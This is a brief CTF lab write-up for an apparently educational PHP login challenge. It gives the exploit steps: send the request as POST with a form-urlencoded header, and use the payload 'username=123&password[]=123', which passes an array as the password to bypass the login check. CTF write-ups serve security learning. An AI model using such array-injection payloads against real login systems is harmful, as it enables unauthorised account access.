Simple Web 0x19(Lab - PHP Login)
tags: NTUSTWS CTF Web
Challenge: http://h4ck3r.quest:8081
Background
Source code
1 |
|
Exploit
Must change GET method to POST method and add Content-Type: application/x-www-form-urlencoded in header
通靈
Payload: username=123&password[]=123
